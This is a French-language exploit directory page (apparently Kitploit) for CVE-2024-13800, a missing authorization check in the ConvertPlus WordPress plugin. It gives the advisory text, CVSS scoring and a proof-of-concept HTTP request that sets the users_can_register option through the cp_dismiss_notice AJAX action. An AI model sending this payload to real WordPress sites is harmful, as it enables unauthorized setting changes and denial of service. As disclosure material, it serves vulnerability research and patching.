Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-13800 — Plugin de popup pour WordPress - ConvertPlus <= 3.5.30 - Absence d'autorisation pour mise à jour limitée des options par utilisateur authentifié (Abonné+) | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-13800
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionMauvaise Configuration
GitHubrandomrobbiebf/cve-2024-13800

CVE-2024-13800

Plugin de popup pour WordPress - ConvertPlus <= 3.5.30 - Absence d'autorisation pour mise à jour limitée des options par utilisateur authentifié (Abonné+)

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-13800

Popup Plugin For WordPress - ConvertPlus <= 3.5.30 - Absence d'autorisation pour les utilisateurs authentifiés (Abonné+) - Mise à jour limitée des options

Description

Le plugin ConvertPlus pour WordPress est vulnérable à la modification non autorisée de données pouvant entraîner un déni de service en raison d'un contrôle de capacité manquant sur le point de terminaison AJAX 'cp_dismiss_notice' dans toutes les versions jusqu'à la version 3.5.30 incluse. Cela permet à des attaquants authentifiés, ayant au moins le niveau d'accès Abonné, de mettre à jour des valeurs d'options à '1' sur le site WordPress. Cela peut être exploité pour mettre à jour une option qui créerait une erreur sur le site et refuserait le service aux utilisateurs légitimes, ou être utilisé pour définir certaines valeurs à vrai, comme l'inscription.

Détails

  • Type : plugin
  • Slug : convertplug
  • Version affectée : 3.5.30
  • Score CVSS : 8.1
  • Évaluation CVSS : Élevé
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE : CVE-2024-13800
  • Statut : Privé

Notes

Il met seulement un 1 dans la base de données, donc vous ne pouvez mettre qu'un 1 dans users_can_register

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:5555
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://kubernetes.docker.internal:5555
Connection: keep-alive
Referer: http://kubernetes.docker.internal:5555/wp-admin/options-general.php
Cookie: wordpress_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7C8cb19a315a9569e77d5be2bf7555f178a9edba2afbc32d1499b8cfd5552e28b9; wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1742893819; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7Cf4d35f828e20c240ecf95e5940bddf55741adc8048977e60afd45a178c003011

action=cp_dismiss_notice&notice=users_can_register
Télécharger l’outil